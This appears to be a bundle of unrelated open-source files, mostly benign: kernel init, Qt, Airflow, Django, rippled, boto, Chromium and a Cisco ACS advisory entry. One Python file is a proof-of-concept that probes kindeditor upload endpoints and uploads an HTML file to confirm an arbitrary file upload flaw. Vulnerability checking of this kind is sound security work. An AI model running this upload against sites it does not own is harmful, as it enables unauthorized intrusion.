// Initgraph task: set up the registry and initialize CPU #0.
static initgraph::Task initBootProcessorTask{&globalInitEngine,
	"arm.init-boot-processor",
	initgraph::Entails{getBootProcessorReadyStage()},
	[] {
		allCpuContexts.initialize(*kernelAlloc);

		infoLogger() << "Booting on CPU #0" << frg::endlog;

		initializeThisProcessor();
	}
};

initgraph::Stage *getBootProcessorReadyStage() {
	static initgraph::Stage s{&globalInitEngine, "arm.boot-processor-ready"};
	return &s;
}

initgraph::Edge bootProcessorReadyEdge{
	getBootProcessorReadyStage(),
	getFibersAvailableStage()
};

// Per-CPU bring-up: enable the FPU and cache-related SCTLR bits, register
// this CPU in the registry, allocate its kernel stacks, and start the fiber
// that services the CPU's general work queue.
void initializeThisProcessor() {
	auto cpu_data = getCpuData();

	// Enable FPU
	asm volatile ("msr cpacr_el1, %0" :: "r"(uint64_t(0b11 << 20)));

	// Enable access to cache info register and cache maintenance instructions
	// (SCTLR_EL1 bits 14, 15, 26 — DZE/UCT/UCI per the ARM ARM; verify)
	uint64_t sctlr;
	asm volatile ("mrs %0, sctlr_el1" : "=r"(sctlr));
	sctlr |= (uint64_t(1) << 14);
	sctlr |= (uint64_t(1) << 15);
	sctlr |= (uint64_t(1) << 26);
	asm volatile ("msr sctlr_el1, %0" :: "r"(sctlr));

	cpu_data->cpuIndex = allCpuContexts->size();
	allCpuContexts->push(cpu_data);

	cpu_data->irqStack = UniqueKernelStack::make();
	cpu_data->detachedStack = UniqueKernelStack::make();
	cpu_data->idleStack = UniqueKernelStack::make();

	cpu_data->irqStackPtr = cpu_data->irqStack.basePtr();

	cpu_data->wqFiber = KernelFiber::post([] {
		// Do nothing. Our only purpose is to run the associated work queue.
	});
	cpu_data->generalWorkQueue = cpu_data->wqFiber->associatedWorkQueue()->selfPtr.lock();
	assert(cpu_data->generalWorkQueue);
}

} // namespace thor
3,204
7,158
<filename>modules/cvv/src/qtutil/matchview/matchsettingsselector.cpp<gh_stars>1000+
// Widget that lets the user pick a registered MatchSettings implementation
// from a combo box and hosts the currently selected settings widget.
#include <QVBoxLayout>
#include <QPushButton>

#include "matchsettingsselector.hpp"
#include "../../util/util.hpp"

namespace cvv{ namespace qtutil{

MatchSettingsSelector::MatchSettingsSelector(const std::vector<cv::DMatch> &univers,
		QWidget *parent):
	MatchSettings{parent},
	RegisterHelper<MatchSettings,std::vector<cv::DMatch>>{},
	univers_{univers}
{
	// Header row: a "-" button that removes this selector, plus the
	// combo box provided by RegisterHelper (comboBox_ member).
	auto layout=util::make_unique<QVBoxLayout>();
	auto headerLayout=util::make_unique<QHBoxLayout>();
	auto closebutton=util::make_unique<QPushButton>("-");
	closebutton->setMaximumWidth(30);
	// Rebuild the settings widget whenever a new element is selected.
	connect(closebutton.get(),SIGNAL(clicked()),this,SLOT(removeMe()));
	connect(&signalElementSelected(),SIGNAL(signal(QString)),this,SLOT(changedSetting()));
	// release(): ownership passes to the Qt layout/parent hierarchy.
	headerLayout->addWidget(closebutton.release());
	headerLayout->addWidget(comboBox_);
	layout->setContentsMargins(0, 0, 0, 0);
	layout->addLayout(headerLayout.release());
	// Keep a raw pointer to the layout so changedSetting() can swap widgets;
	// the widget (via setLayout) owns it.
	layout_=layout.get();
	setLayout(layout.release());
	// If a valid selection already exists, instantiate its settings widget.
	if(this->has(this->selection())){
		changedSetting();
	}
}

// Forward the current match to the active settings widget.
// NOTE(review): assumes setting_ is non-null here, i.e. that a setting was
// successfully created before any CVVMatch is styled — confirm in header.
void MatchSettingsSelector::setSettings(CVVMatch &match)
{
	setting_->setSettings(match);
}

// Instantiate the currently selected MatchSettings factory for univers_ and
// swap it in for the previous settings widget (if any).
void MatchSettingsSelector::changedSetting()
{
	auto setting=(*this)()(univers_);
	if(setting){
		if(setting_){
			// Detach and dispose the old widget; deleteLater() defers
			// destruction until control returns to the event loop.
			layout_->removeWidget(setting_);
			disconnect(setting_,SIGNAL(settingsChanged(MatchSettings&)),
			           this,SIGNAL(settingsChanged(MatchSettings&)));
			setting_->deleteLater();
		}
		// Order matters: take the raw pointer first, then hand ownership
		// to the layout via release().
		setting_=setting.get();
		layout_->addWidget(setting.release());
		// Re-emit the child's change signal as our own.
		connect(setting_,SIGNAL(settingsChanged(MatchSettings&)),
		        this,SIGNAL(settingsChanged(MatchSettings&)));
		setting_->updateAll();
	}
}

}}
582
8,092
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import os from datetime import datetime from airflow import models from airflow.decorators import task from airflow.providers.amazon.aws.hooks.s3 import S3Hook from airflow.providers.amazon.aws.operators.s3 import S3CreateBucketOperator, S3DeleteBucketOperator from airflow.providers.google.cloud.operators.gcs import GCSCreateBucketOperator, GCSDeleteBucketOperator from airflow.providers.google.cloud.transfers.s3_to_gcs import S3ToGCSOperator GCP_PROJECT_ID = os.environ.get('GCP_PROJECT_ID', 'gcp-project-id') S3BUCKET_NAME = os.environ.get('S3BUCKET_NAME', 'example-s3bucket-name') GCS_BUCKET = os.environ.get('GCP_GCS_BUCKET', 'example-gcsbucket-name') GCS_BUCKET_URL = f"gs://{GCS_BUCKET}/" UPLOAD_FILE = '/tmp/example-file.txt' PREFIX = 'TESTS' @task(task_id='upload_file_to_s3') def upload_file(): """A callable to upload file to AWS bucket""" s3_hook = S3Hook() s3_hook.load_file(filename=UPLOAD_FILE, key=PREFIX, bucket_name=S3BUCKET_NAME) with models.DAG( 'example_s3_to_gcs', schedule_interval='@once', start_date=datetime(2021, 1, 1), catchup=False, tags=['example'], ) as dag: create_s3_bucket = S3CreateBucketOperator( task_id="create_s3_bucket", bucket_name=S3BUCKET_NAME, region_name='us-east-1' ) 
create_gcs_bucket = GCSCreateBucketOperator( task_id="create_bucket", bucket_name=GCS_BUCKET, project_id=GCP_PROJECT_ID, ) # [START howto_transfer_s3togcs_operator] transfer_to_gcs = S3ToGCSOperator( task_id='s3_to_gcs_task', bucket=S3BUCKET_NAME, prefix=PREFIX, dest_gcs=GCS_BUCKET_URL ) # [END howto_transfer_s3togcs_operator] delete_s3_bucket = S3DeleteBucketOperator( task_id='delete_s3_bucket', bucket_name=S3BUCKET_NAME, force_delete=True ) delete_gcs_bucket = GCSDeleteBucketOperator(task_id='delete_gcs_bucket', bucket_name=GCS_BUCKET) ( create_s3_bucket >> upload_file() >> create_gcs_bucket >> transfer_to_gcs >> delete_s3_bucket >> delete_gcs_bucket )
1,125
974
# URL routes for the extra_views test suite: each route maps to one of the
# formset / inline / list views exercised by the tests. Route order is
# significant to Django's resolver, so entries must not be reordered.
from django.urls import path
from django.views.generic import TemplateView

from .formsets import AddressFormSet
from .views import (
    AddressFormSetView,
    AddressFormSetViewKwargs,
    AddressFormSetViewNamed,
    EventCalendarView,
    FormAndFormSetOverrideView,
    ItemModelFormSetExcludeView,
    ItemModelFormSetView,
    OrderCreateNamedView,
    OrderCreateView,
    OrderItemFormSetView,
    OrderTagsView,
    OrderUpdateView,
    PagedModelFormSetView,
    SearchableItemListView,
    SortableItemListView,
)

urlpatterns = [
    # Plain FormSetView variants
    path("formset/simple/", AddressFormSetView.as_view()),
    path("formset/simple/named/", AddressFormSetViewNamed.as_view()),
    path("formset/simple/kwargs/", AddressFormSetViewKwargs.as_view()),
    path(
        "formset/simple_redirect/",
        AddressFormSetView.as_view(success_url="/formset/simple_redirect/valid/"),
    ),
    path(
        "formset/simple_redirect/valid/",
        TemplateView.as_view(template_name="extra_views/success.html"),
    ),
    path("formset/custom/", AddressFormSetView.as_view(formset_class=AddressFormSet)),
    # ModelFormSetView variants
    path("modelformset/simple/", ItemModelFormSetView.as_view()),
    path("modelformset/exclude/", ItemModelFormSetExcludeView.as_view()),
    path("modelformset/custom/", FormAndFormSetOverrideView.as_view()),
    path("modelformset/paged/", PagedModelFormSetView.as_view()),
    # Inline formsets and create/update views with inlines
    path("inlineformset/<int:pk>/", OrderItemFormSetView.as_view()),
    path("inlines/<int:pk>/new/", OrderCreateView.as_view()),
    path("inlines/new/", OrderCreateView.as_view()),
    path("inlines/new/named/", OrderCreateNamedView.as_view()),
    path("inlines/<int:pk>/", OrderUpdateView.as_view()),
    path("genericinlineformset/<int:pk>/", OrderTagsView.as_view()),
    # List / calendar / search views
    path("sortable/<str:flag>/", SortableItemListView.as_view()),
    path("events/<int:year>/<str:month>/", EventCalendarView.as_view()),
    path("searchable/", SearchableItemListView.as_view()),
    path(
        "searchable/predefined_query/",
        SearchableItemListView.as_view(define_query=True),
    ),
    path("searchable/exact_query/", SearchableItemListView.as_view(exact_query=True)),
    path("searchable/wrong_lookup/", SearchableItemListView.as_view(wrong_lookup=True)),
]
876
3,804
<reponame>sneh19337/rippled //------------------------------------------------------------------------------ /* This file is part of rippled: https://github.com/ripple/rippled Copyright (c) 2012, 2013 Ripple Labs Inc. Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL , DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ //============================================================================== #include <ripple/basics/PerfLog.h> #include <ripple/basics/contract.h> #include <ripple/core/JobQueue.h> #include <mutex> namespace ripple { JobQueue::JobQueue( beast::insight::Collector::ptr const& collector, beast::Journal journal, Logs& logs, perf::PerfLog& perfLog) : m_journal(journal) , m_lastJob(0) , m_invalidJobData(JobTypes::instance().getInvalid(), collector, logs) , m_processCount(0) , m_workers(*this, &perfLog, "JobQueue", 0) , m_cancelCallback(std::bind(&JobQueue::isStopping, this)) , perfLog_(perfLog) , m_collector(collector) { hook = m_collector->make_hook(std::bind(&JobQueue::collect, this)); job_count = m_collector->make_gauge("job_count"); { std::lock_guard lock(m_mutex); for (auto const& x : JobTypes::instance()) { JobTypeInfo const& jt = x.second; // And create dynamic information for all jobs auto const result(m_jobData.emplace( std::piecewise_construct, std::forward_as_tuple(jt.type()), std::forward_as_tuple(jt, m_collector, logs))); assert(result.second == true); 
(void)result.second; } } } JobQueue::~JobQueue() { // Must unhook before destroying hook = beast::insight::Hook(); } void JobQueue::collect() { std::lock_guard lock(m_mutex); job_count = m_jobSet.size(); } bool JobQueue::addRefCountedJob( JobType type, std::string const& name, JobFunction const& func) { assert(type != jtINVALID); auto iter(m_jobData.find(type)); assert(iter != m_jobData.end()); if (iter == m_jobData.end()) return false; JLOG(m_journal.debug()) << __func__ << " : Adding job : " << name << " : " << type; JobTypeData& data(iter->second); // FIXME: Workaround incorrect client shutdown ordering // do not add jobs to a queue with no threads assert(type == jtCLIENT || m_workers.getNumberOfThreads() > 0); { std::lock_guard lock(m_mutex); auto result = m_jobSet.emplace( type, name, ++m_lastJob, data.load(), func, m_cancelCallback); queueJob(*result.first, lock); } return true; } int JobQueue::getJobCount(JobType t) const { std::lock_guard lock(m_mutex); JobDataMap::const_iterator c = m_jobData.find(t); return (c == m_jobData.end()) ? 0 : c->second.waiting; } int JobQueue::getJobCountTotal(JobType t) const { std::lock_guard lock(m_mutex); JobDataMap::const_iterator c = m_jobData.find(t); return (c == m_jobData.end()) ? 
0 : (c->second.waiting + c->second.running); } int JobQueue::getJobCountGE(JobType t) const { // return the number of jobs at this priority level or greater int ret = 0; std::lock_guard lock(m_mutex); for (auto const& x : m_jobData) { if (x.first >= t) ret += x.second.waiting; } return ret; } void JobQueue::setThreadCount(int c, bool const standaloneMode) { if (standaloneMode) { c = 1; } else if (c == 0) { c = static_cast<int>(std::thread::hardware_concurrency()); c = 2 + std::min(c, 4); // I/O will bottleneck JLOG(m_journal.info()) << "Auto-tuning to " << c << " validation/transaction/proposal threads."; } else { JLOG(m_journal.info()) << "Configured " << c << " validation/transaction/proposal threads."; } m_workers.setNumberOfThreads(c); } std::unique_ptr<LoadEvent> JobQueue::makeLoadEvent(JobType t, std::string const& name) { JobDataMap::iterator iter(m_jobData.find(t)); assert(iter != m_jobData.end()); if (iter == m_jobData.end()) return {}; return std::make_unique<LoadEvent>(iter->second.load(), name, true); } void JobQueue::addLoadEvents(JobType t, int count, std::chrono::milliseconds elapsed) { if (isStopped()) LogicError("JobQueue::addLoadEvents() called after JobQueue stopped"); JobDataMap::iterator iter(m_jobData.find(t)); assert(iter != m_jobData.end()); iter->second.load().addSamples(count, elapsed); } bool JobQueue::isOverloaded() { int count = 0; for (auto& x : m_jobData) { if (x.second.load().isOver()) ++count; } return count > 0; } Json::Value JobQueue::getJson(int c) { using namespace std::chrono_literals; Json::Value ret(Json::objectValue); ret["threads"] = m_workers.getNumberOfThreads(); Json::Value priorities = Json::arrayValue; std::lock_guard lock(m_mutex); for (auto& x : m_jobData) { assert(x.first != jtINVALID); if (x.first == jtGENERIC) continue; JobTypeData& data(x.second); LoadMonitor::Stats stats(data.stats()); int waiting(data.waiting); int running(data.running); if ((stats.count != 0) || (waiting != 0) || (stats.latencyPeak != 0ms) || 
(running != 0)) { Json::Value& pri = priorities.append(Json::objectValue); pri["job_type"] = data.name(); if (stats.isOverloaded) pri["over_target"] = true; if (waiting != 0) pri["waiting"] = waiting; if (stats.count != 0) pri["per_second"] = static_cast<int>(stats.count); if (stats.latencyPeak != 0ms) pri["peak_time"] = static_cast<int>(stats.latencyPeak.count()); if (stats.latencyAvg != 0ms) pri["avg_time"] = static_cast<int>(stats.latencyAvg.count()); if (running != 0) pri["in_progress"] = running; } } ret["job_types"] = priorities; return ret; } void JobQueue::rendezvous() { std::unique_lock<std::mutex> lock(m_mutex); cv_.wait(lock, [this] { return m_processCount == 0 && m_jobSet.empty(); }); } JobTypeData& JobQueue::getJobTypeData(JobType type) { JobDataMap::iterator c(m_jobData.find(type)); assert(c != m_jobData.end()); // NIKB: This is ugly and I hate it. We must remove jtINVALID completely // and use something sane. if (c == m_jobData.end()) return m_invalidJobData; return c->second; } void JobQueue::stop() { stopping_ = true; using namespace std::chrono_literals; jobCounter_.join("JobQueue", 1s, m_journal); { // After the JobCounter is joined, all jobs have finished executing // (i.e. returned from `Job::doJob`) and no more are being accepted, // but there may still be some threads between the return of // `Job::doJob` and the return of `JobQueue::processTask`. That is why // we must wait on the condition variable to make these assertions. 
std::unique_lock<std::mutex> lock(m_mutex); cv_.wait( lock, [this] { return m_processCount == 0 && m_jobSet.empty(); }); assert(m_processCount == 0); assert(m_jobSet.empty()); assert(nSuspend_ == 0); stopped_ = true; } } bool JobQueue::isStopped() const { return stopped_; } void JobQueue::queueJob(Job const& job, std::lock_guard<std::mutex> const& lock) { JobType const type(job.getType()); assert(type != jtINVALID); assert(m_jobSet.find(job) != m_jobSet.end()); perfLog_.jobQueue(type); JobTypeData& data(getJobTypeData(type)); if (data.waiting + data.running < getJobLimit(type)) { m_workers.addTask(); } else { // defer the task until we go below the limit // ++data.deferred; } ++data.waiting; } void JobQueue::getNextJob(Job& job) { assert(!m_jobSet.empty()); std::set<Job>::const_iterator iter; for (iter = m_jobSet.begin(); iter != m_jobSet.end(); ++iter) { JobTypeData& data(getJobTypeData(iter->getType())); assert(data.running <= getJobLimit(data.type())); // Run this job if we're running below the limit. 
if (data.running < getJobLimit(data.type())) { assert(data.waiting > 0); break; } } assert(iter != m_jobSet.end()); JobType const type = iter->getType(); JobTypeData& data(getJobTypeData(type)); assert(type != jtINVALID); job = *iter; m_jobSet.erase(iter); --data.waiting; ++data.running; } void JobQueue::finishJob(JobType type) { assert(type != jtINVALID); JobTypeData& data = getJobTypeData(type); // Queue a deferred task if possible if (data.deferred > 0) { assert(data.running + data.waiting >= getJobLimit(type)); --data.deferred; m_workers.addTask(); } --data.running; } void JobQueue::processTask(int instance) { JobType type; { using namespace std::chrono; Job::clock_type::time_point const start_time(Job::clock_type::now()); { Job job; { std::lock_guard lock(m_mutex); getNextJob(job); ++m_processCount; } type = job.getType(); JobTypeData& data(getJobTypeData(type)); JLOG(m_journal.trace()) << "Doing " << data.name() << "job"; // The amount of time that the job was in the queue auto const q_time = ceil<microseconds>(start_time - job.queue_time()); perfLog_.jobStart(type, q_time, start_time, instance); job.doJob(); // The amount of time it took to execute the job auto const x_time = ceil<microseconds>(Job::clock_type::now() - start_time); if (x_time >= 10ms || q_time >= 10ms) { getJobTypeData(type).dequeue.notify(q_time); getJobTypeData(type).execute.notify(x_time); } perfLog_.jobFinish(type, x_time, instance); } } { std::lock_guard lock(m_mutex); // Job should be destroyed before stopping // otherwise destructors with side effects can access // parent objects that are already destroyed. finishJob(type); if (--m_processCount == 0 && m_jobSet.empty()) cv_.notify_all(); } // Note that when Job::~Job is called, the last reference // to the associated LoadEvent object (in the Job) may be destroyed. } int JobQueue::getJobLimit(JobType type) { JobTypeInfo const& j(JobTypes::instance().get(type)); assert(j.type() != jtINVALID); return j.limit(); } } // namespace ripple
5,054
351
#!/usr/bin/env python3
import re

from app.lib.utils.request import request
from app.lib.utils.common import get_useragent


class Upload_File_BaseVerify:
    """PoC check for the kindeditor (<= 4.1.5) arbitrary file upload flaw.

    Probes the stock upload_json endpoints; if one is reachable, uploads an
    HTML page that embeds kindeditor's own upload button and reports success.
    """

    # Stock upload endpoints shipped with vulnerable kindeditor installs.
    UPLOAD_PATHS = [
        '/kindeditor/asp/upload_json.asp',
        '/kindeditor/asp.net/upload_json.ashx',
        '/kindeditor/jsp/upload_json.jsp',
        '/kindeditor/php/upload_json.php',
        '/kindeditor/examples/uploadbutton.html',
    ]

    # Uploader page template, rendered with (base_url, upload_endpoint_url).
    HTML_TEMPLATE = '''
    <html><head>
    <title>Uploader</title>
    <script src="%s/SEMCMS_PHP_3.9/Edit/kindeditor.js"></script>
    <script>
    KindEditor.ready(function(K) {
        var uploadbutton = K.uploadbutton({
            button : K('#uploadButton')[0],
            fieldName : 'imgFile',
            url : '%s',
            afterUpload : function(data) {
                if (data.error === 0) {
                    var url = K.formatUrl(data.url, 'absolute');
                    K('#url').val(url);}
            },
        });
        uploadbutton.fileBox.change(function(e) {
            uploadbutton.submit();
        });
    });
    </script></head><body>
    <div class="upload">
        <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
        <input type="button" id="uploadButton" value="Upload" />
    </div>
    </body>
    </html>
    '''

    def __init__(self, url):
        self.info = {
            'name': 'kindeditor 文件上传漏洞',
            'description': 'kindeditor 文件上传漏洞, 影响范围为: kindeditor<=4.1.5',
            'date': '',
            'exptype': 'check',
            'type': 'File Upload'
        }
        self.url = url
        # "https://..." also starts with "http", so a single prefix check is
        # enough to detect a missing scheme (the original duplicated this
        # check with a redundant "https" clause, here and in check_path()).
        if not self.url.startswith("http"):
            self.url = "http://" + self.url
        self.headers = {
            'User-Agent': get_useragent()
        }
        # Filled in by check_path() with the first reachable upload endpoint.
        self.path = ''

    @property
    def html_payload(self):
        """The uploader HTML page rendered against the discovered endpoint.

        BUG FIX: the original formatted this template inside __init__, before
        check_path() had populated self.path, so the uploaded page always
        posted to an empty URL. Rendering lazily uses the real endpoint.
        """
        return self.HTML_TEMPLATE % (self.url, self.path)

    def check_path(self):
        """
        检测是否存在路径

        :return bool True or False: 是否存在路径
        """
        for candidate in self.UPLOAD_PATHS:
            check_url = self.url + candidate + '?dir=file'
            check = request.get(check_url, headers=self.headers)
            if check.status_code == 200:
                self.path = check_url
                return True
        return False

    def check(self):
        """
        检测是否存在漏洞

        :return bool True or False: 是否存在漏洞
        """
        try:
            if not self.check_path():
                print("不存在kindeditor上传漏洞")
                return False
            files = {
                'imgFile': ('test.html', self.html_payload, 'application/octet-stream')
            }
            upload_html = request.post(self.path, headers=self.headers, files=files)
            if upload_html.status_code != 200:
                print("不存在kindeditor上传漏洞")
                return False
            # Pull the stored file's URL out of the JSON-ish response body;
            # a missing match raises IndexError and falls into the handler.
            pattern = re.compile('{"error":0,"url":"(.*?)"}')
            html = pattern.findall(upload_html.text)[0].replace('\\', '').split('/')
            html_path = '/' + '/'.join(html[2:])
            # Fetch the uploaded page to confirm it was stored (result unused,
            # matching the original behaviour).
            request.get(self.url + html_path, headers=self.headers)
            print("存在kindeditor上传漏洞")
            return True
        except Exception as e:
            print(e)
            return False


if __name__ == "__main__":
    UPLOAD_FILE = Upload_File_BaseVerify('http://baidu.com/')
    UPLOAD_FILE.check()
2,500
2,151
<reponame>stdft112/depot_tools<filename>third_party/boto/services/sonofmmm.py # Copyright (c) 2006,2007 <NAME> http://garnaat.org/ # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. 
import boto
from boto.services.service import Service
from boto.services.message import ServiceMessage
import os
import mimetypes


class SonOfMMM(Service):
    # A boto Service worker that transcodes files from an input S3 bucket to
    # an output bucket by shelling out to ffmpeg, driven by a message queue.

    def __init__(self, config_file=None):
        Service.__init__(self, config_file)
        # Per-instance log file; uploaded to the output bucket at shutdown.
        self.log_file = '%s.log' % self.instance_id
        self.log_path = os.path.join(self.working_dir, self.log_file)
        boto.set_file_logger(self.name, self.log_path)
        # NOTE(review): self.sd appears to be a config accessor supplied by
        # the Service base class -- confirm against boto.services.service.
        if self.sd.has_option('ffmpeg_args'):
            self.command = '/usr/local/bin/ffmpeg ' + self.sd.get('ffmpeg_args')
        else:
            # Default: "-y" overwrites output; "-i %s %s" is (input, output).
            self.command = '/usr/local/bin/ffmpeg -y -i %s %s'
        self.output_mimetype = self.sd.get('output_mimetype')
        if self.sd.has_option('output_ext'):
            self.output_ext = self.sd.get('output_ext')
        else:
            # Derive the extension (e.g. ".mp4") from the configured mimetype.
            self.output_ext = mimetypes.guess_extension(self.output_mimetype)
        self.output_bucket = self.sd.get_obj('output_bucket')
        self.input_bucket = self.sd.get_obj('input_bucket')
        # check to see if there are any messages queue
        # if not, create messages for all files in input_bucket
        m = self.input_queue.read(1)
        if not m:
            self.queue_files()

    def queue_files(self):
        # Enqueue one ServiceMessage per key found in the input bucket.
        boto.log.info('Queueing files from %s' % self.input_bucket.name)
        for key in self.input_bucket:
            boto.log.info('Queueing %s' % key.name)
            m = ServiceMessage()
            if self.output_bucket:
                d = {'OutputBucket' : self.output_bucket.name}
            else:
                d = None
            m.for_key(key, d)
            self.input_queue.write(m)

    def process_file(self, in_file_name, msg):
        # Transcode one downloaded file; return [(path, mimetype)] on success
        # so the base Service can upload it, or [] when ffmpeg fails.
        base, ext = os.path.splitext(in_file_name)
        out_file_name = os.path.join(self.working_dir, base+self.output_ext)
        command = self.command % (in_file_name, out_file_name)
        boto.log.info('running:\n%s' % command)
        status = self.run(command)
        if status == 0:
            return [(out_file_name, self.output_mimetype)]
        else:
            return []

    def shutdown(self):
        # Preserve this instance's log in the output bucket before the base
        # class tears the service down.
        if os.path.isfile(self.log_path):
            if self.output_bucket:
                key = self.output_bucket.new_key(self.log_file)
                key.set_contents_from_filename(self.log_path)
        Service.shutdown(self)
1,492
3,285
"""
Copyright 2020 The OneFlow Authors. All rights reserved.

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import threading


def Await(counter, func):
    """Run ``func(Yield)`` and block until ``Yield`` has fired ``counter``
    times; returns the list of yielded values in call order. ``Yield`` may be
    invoked from the calling thread or from threads ``func`` spawns.
    """
    assert counter > 0
    cond_var = threading.Condition()
    remaining = [counter]  # boxed so the closure below can mutate it
    results = []

    def Yield(result=None):
        # Record the value, then atomically decrement the countdown and wake
        # the waiting thread.
        results.append(result)
        with cond_var:
            assert remaining[0] > 0
            remaining[0] -= 1
            cond_var.notify()

    func(Yield)
    # Wait for all expected Yield calls; wait_for handles spurious wakeups.
    with cond_var:
        cond_var.wait_for(lambda: remaining[0] == 0)
    return results
375
14,668
// Copyright 2021 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CHROME_BROWSER_ENTERPRISE_CONNECTORS_DEVICE_TRUST_KEY_MANAGEMENT_BROWSER_COMMANDS_WIN_KEY_ROTATION_COMMAND_H_ #define CHROME_BROWSER_ENTERPRISE_CONNECTORS_DEVICE_TRUST_KEY_MANAGEMENT_BROWSER_COMMANDS_WIN_KEY_ROTATION_COMMAND_H_ #include "base/callback.h" #include "base/memory/scoped_refptr.h" #include "base/win/windows_types.h" #include "chrome/browser/enterprise/connectors/device_trust/key_management/browser/commands/key_rotation_command.h" namespace base { class SingleThreadTaskRunner; } namespace enterprise_connectors { class WinKeyRotationCommand : public KeyRotationCommand { public: // Error returned by Omaha when concurrent elevated commands are run. // Making this public to be used in tests. static const HRESULT GOOPDATE_E_APP_USING_EXTERNAL_UPDATER = 0xA043081D; using RunGoogleUpdateElevatedCommandFn = HRESULT (*)(const wchar_t* command, const std::vector<std::string>& args, DWORD* return_code); // The second constructor is used in tests to override the behaviour of // Google Update. WinKeyRotationCommand(); explicit WinKeyRotationCommand( RunGoogleUpdateElevatedCommandFn run_elevated_command); ~WinKeyRotationCommand() override; // KeyRotationCommand: void Trigger(const Params& params, Callback callback) override; // Enable or disable wait/sleep in tests to keep them from taking too long. void enable_waiting_for_testing(bool enabled) { waiting_enabled_ = enabled; } private: scoped_refptr<base::SingleThreadTaskRunner> com_thread_runner_; bool waiting_enabled_ = true; RunGoogleUpdateElevatedCommandFn run_elevated_command_ = nullptr; }; } // namespace enterprise_connectors #endif // CHROME_BROWSER_ENTERPRISE_CONNECTORS_DEVICE_TRUST_KEY_MANAGEMENT_BROWSER_COMMANDS_WIN_KEY_ROTATION_COMMAND_H_
683
892
<filename>advisories/unreviewed/2022/04/GHSA-cxx4-wmc3-37mh/GHSA-cxx4-wmc3-37mh.json { "schema_version": "1.2.0", "id": "GHSA-cxx4-wmc3-37mh", "modified": "2022-04-29T02:59:37Z", "published": "2022-04-29T02:59:37Z", "aliases": [ "CVE-2004-1459" ], "details": "Cisco Secure Access Control Server (ACS) 3.2, when configured as a Light Extensible Authentication Protocol (LEAP) RADIUS proxy, allows remote attackers to cause a denial of service (device crash) via certain LEAP authentication requests.", "severity": [ ], "affected": [ ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2004-1459" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17116" }, { "type": "WEB", "url": "http://www.cisco.com/warp/public/707/cisco-sa-20040825-acs.shtml" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/11047" } ], "database_specific": { "cwe_ids": [ ], "severity": "MODERATE", "github_reviewed": false } }
506
652
//
//  WLTableViewViewController.h
//  WLBaseView_Example
//
//  Created by 刘光强 on 2018/3/15.
//  Copyright © 2018年 guangqiang-liu. All rights reserved.
//
//  NOTE(review): the header banner says "WLTableViewViewController.h" but the
//  class declared below is WLBaseTableViewViewController -- confirm the actual
//  file name before renaming either.

#import "WLBaseViewController.h"

// Base controller for table-view based screens. Adds no public API over
// WLBaseViewController in this header; behavior lives in the implementation.
@interface WLBaseTableViewViewController : WLBaseViewController

@end
98
746
<gh_stars>100-1000 package org.protege.editor.owl.ui.view.individual; import org.protege.editor.core.ui.RefreshableComponent; import org.protege.editor.core.ui.view.DisposableAction; import org.protege.editor.owl.model.entity.OWLEntityCreationSet; import org.protege.editor.owl.model.event.EventType; import org.protege.editor.owl.model.event.OWLModelManagerListener; import org.protege.editor.owl.model.selection.SelectionDriver; import org.protege.editor.owl.model.util.OWLEntityDeleter; import org.protege.editor.owl.ui.action.DeleteIndividualAction; import org.protege.editor.owl.ui.list.OWLObjectList; import org.protege.editor.owl.ui.renderer.AddEntityIcon; import org.protege.editor.owl.ui.renderer.OWLIndividualIcon; import org.protege.editor.owl.ui.view.ChangeListenerMediator; import org.protege.editor.owl.ui.view.CreateNewTarget; import org.protege.editor.owl.ui.view.Deleteable; import org.protege.editor.owl.ui.view.Findable; import org.semanticweb.owlapi.model.*; import org.semanticweb.owlapi.util.OWLEntityCollector; import javax.swing.*; import 